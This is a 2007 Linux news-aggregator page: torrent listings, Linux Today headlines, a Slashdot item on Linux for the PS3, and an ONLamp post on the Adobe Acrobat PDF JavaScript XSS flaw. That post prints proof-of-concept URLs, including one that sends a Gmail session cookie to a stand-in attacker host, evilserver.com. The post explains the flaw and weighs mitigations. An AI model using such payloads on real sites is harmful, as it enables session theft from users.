•   Distro Watch
•   Linux Today News Service
•   News for nerds, stuff that matters
•   The O'Reilly Network ONLamp Articles and Weblogs

Source: LinuxTracker.org

Category: SUSE Size: 2.19 GB Status: 22 seeders and 36 leechers Added: 2007-01-04 18:04:32

Source: LinuxTracker.org

Category: LG3D Size: 264.05 MB Status: 21 seeders and 8 leechers Added: 2007-01-04 13:26:53

Source: LinuxTracker.org

Category: ParallelKnoppix Size: 285.07 MB Status: 2 seeders and no leecher Added: 2007-01-04 12:21:15

Source: LinuxTracker.org

Category: TrixBox Size: 561.89 MB Status: 6 seeders and 4 leechers Added: 2007-01-04 08:52:52

Source: LinuxTracker.org

Category: TrixBox Size: 65.65 MB Status: 2 seeders and no leecher Added: 2007-01-04 08:49:55

Source: LinuxTracker.org

Category: TrixBox Size: 539.38 MB Status: 5 seeders and 3 leechers Added: 2007-01-04 08:42:46

Source: LinuxTracker.org

Category: Kubuntu Size: 697.74 MB Status: 3 seeders and 2 leechers Added: 2007-01-04 00:47:05

Source: knoppix

Klaus Knopper has released a bug-fix update to KNOPPIX 5.1, with corrections to the Kicker bug and update to Firefox. From the changelog: "V5.1.1 2007-01-04. Updated Kicker and kdebase (while fixing a nasty bug that made Kicker 'disappear' in all but the first desktop; updated ntfs-3g (writing speed .

Source: lg3d

LG3D LiveCD 3.0, a bootable CD featuring the recently released version 1.0 or the Java-based 3D Desktop known as Project Looking Glass, is now available for download: "Finally LG3D LiveCD 3.0 has been released. Based on SLAX 5.1.8, this LG3D LiveCD 3.0 showcases Sun Microsystem's stunning 3D desktop .

Source: Linux Today

At the end of 2006, I prepared myself for a 'survival experiment '

Source: Linux Today

Having used KDE for close to 10 years now, I am clearly a fan but I am not sure KDE 2, 3, 4 or 27 is the answer

Source: Linux Today

When I talk with my Novell friends, I'm surprised by how naive they are about their recent pact with Microsoft

Source: Linux Today

Eric A. Hall was looking for a Linux distro that combines stability with the capabilities needed to test bleeding-edge technology

Source: Linux Today

So, why do only a handful of people run Linux instead of Windows? Here are my top-four reasons why Windows wins and Linux loses

Source: Linux Today

For years, the only way to get a free all-in-one Asterisk open source IP-PBX easily setup and managed was to go to a third-party distribution, such as Asterisk@home. It's now time for Asterisk to make it easy on its own

Source: Linux Today

[C]ommunity members are still debating whether a missed deadline and the alleged demotivation of some programmers make the experiment a failure

Source: Linux Today

Firefox might be free, but that doesn't mean Mozilla is in the poorhouse. Although some speculated on one, higher, figure, Mitchell Baker, chair of the Mozilla Foundation, said that Mozilla made just under $53 million in 2005

Source: Linux Today

Here's an announcement that almost got drowned out by festive cheer: MySQL has changed the license it uses for its open source database management system to avoid being forced to move to the forthcoming GPL v3

Source: Linux Today

Novell moved Wednesday to underscore its support for free software development after volunteer technical support for rival Red Hat's free Linux version collapsed

Source: Linux Today

Neither the ext4 filesystem nor Samba 4 are ready for prime-time yet, but they are chock-full of promise and potential, so let's take a look at what they are promising to deliver

Source: Linux Today

As an IT manager, how can you manage your Linux infrastructure more effectively so that you can attend to tedious management tasks and still have time for the fun stuff, like implementing new projects and systems ?

Source: Linux Today

While not perfect, support for scanners on Linux is constantly improving; just check the list of devices supported by SANE

Source: Linux Today

The aim of this article is to introduce the reader to Bzflags

Source: Linux Today

LAMP (Linux, Apache, MySQL, PHP) is a combination of free software that offers a convenient way to centralize and administer data. In this tip, we'll discuss the benefits and drawbacks of LAMP

Source: Linux Today

I can report that HDTV under Linux is not only possible, it's downright fantastic

Source: Linux Today

For people migrating from Windows to Linux, the Apache Web server is entirely different world from Microsoft Internet Information Server

Source: Linux Today

It has been one year to the day since XGI Technology had last released a Volari Linux display driver and about 14 months since we had first delivered word of XGI considering open-source 3D display drivers

Source: Linux Today

Yes, today's tip is about Yet Another Messaging Server. This time Citadel. And why not ?

Source: Linux Today

Part one of this article focuses on the technical details and challenges for traffic acquisition, and provides design requirements and best practices for wireless forensics tools

Source: Linux Today

Today's security advisories: openoffice.org (Fedora Core); openoffice.org (Red Hat Linux); and firefox 1.5, firefox 2.0, and w3m (Ubuntu).

Source: Linux Today

Given that, the latest version of Mandriva (Mandriva One 2007) had my eyes glassy and my pulse racing--particularly after I had read an article about it, and a non-programmer colleague described having played with the live CD

Source: Linux Today

For a moment, it seemed like things could happen pretty quickly. Martin Bligh suggested that, rather than trying to nickel-and-dime binary modules to death, it would be more honest to just ban them outright

Source: Linux Today

It's heartening to see so many large Dutch public sector organisations looking at open source

Source: Linux Today

In spite of our technical talents and skills despite enviable abilities to add our individual accomplishments to the Greatest Mass Effort since the Kibbutz; there is something astounding we have missed

Source: Linux Today

In the 1990s Linus Torvalds used to give a talk called World Domination 101 on the early steps he believed Linux would need to take to achieve 'world domination--fast '

Source: Linux Today

But as I read through the article, I was already thinking: 'What the heck is this guy talking about ?'

Source: Slashdot: Linux

johnnyb writes "A new series of articles is out on IBM DeveloperWorks on programming the PS3. The first article is up, discussing the installation of Yellow Dog Linux and first steps in programming the Cell BE Processor on this platform. From the article: ' It is unusual for gaming consoles to allow foreign operating systems to be installed on them. Since consoles are usually sold at a loss, they are usually locked down to prevent games from running on them without the publisher paying royalties to the console developer. Sony decided to open up the PS3 console a little bit, and allow third-party operating systems to be installed, with the caveat that they do not get accelerated graphics. Because of this, you can now install Linux on the PS3. You have to jump through a few hoops, but it definitely works.'"

Source: ONLamp.com

The Adobe JavaScript execution bug recently discovered is a huge security issue for any organization that serves PDF files via its web servers.
This post mentions the bug originally found by Stefano Di Paola and Giorgio Fedon:
It seems that PDF documents can execute JavaScript code for no apparent reason by using the following template:
http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
You must understand that the attacker doesn’t need to have write access to the specified PDF document.
In other words, the Adobe Acrobat client will execute the JavaScript code. For example, click on the following URL after logging into GMail:
http://mail.google.com/mail/help/docs/
Gmail_shortcuts.pdf#blah=javascript:alert(document.cookie);
If you have Adobe Acrobat, the above URL should open up the PDF and display a JavaScript popup with your Google/GMail cookie (this may not effect certain IE versions so try Firefox for best results, and may require versions 6 or 7 of the Adobe Acrobat reader). It pops up your Google/GMail cookie because Adobe executes the JavaScript in the context of your browser session - since the PDF is hosted by Google, document.cookie relates to your Google/GMail session.
Instead of this demonstration, an attacker could embed malicious JavaScript code to have the cookie value for your Google/GMail session sent to him or her by making you click on a URL such as the following:
http://mail.google.com/mail/help/docs/Gmail_shortcuts.pdf#blah=javascript:
document.location='http://evilserver.com/capturecookie.cgi?cookie='+
document.cookie;
The above request will cause Acrobat to request http://evilserver.com/capturecookie.cgi with cookie=[your Google/GMail cookie] which can be captured by capturecookie.cgi.
This isn’t Google’s fault. It’s Adobe’s. This is a huge issue for anyone hosting PDF files because there is nothing they can do to easily mitigate the issue. Any web server hosting PDFs is now vulnerable to Cross Site Scripting (XSS) thanks to Adobe. Possible options:
1) Stop hosting PDF files. This may not be an option for many organizations.
2) Sit around and pray that users upgrade to a patched (or rather, a new client without the Open Parameters ‘feature’) Acrobat client, but this isn’t worth holding your breath on - no sane organization is going to accept such a risk - most users do not routinely upgrade their Acrobat readers, and most organizations cannot simply demand their users switch to a non-Adobe PDF reader.
3) Note that in the above example, the browser will only send a GET /path/to/pdf/file.pdf HTTP/1.0 request to the server, so the solution isn’t as simple as filtering requests on the web server. Amit Klein’s post talks about a clever solution involving redirection using a high entropy value to match a new cookie set via the Set-Cookie header.
If you are interested in this topic, I highly recommend reading the ongoing thread.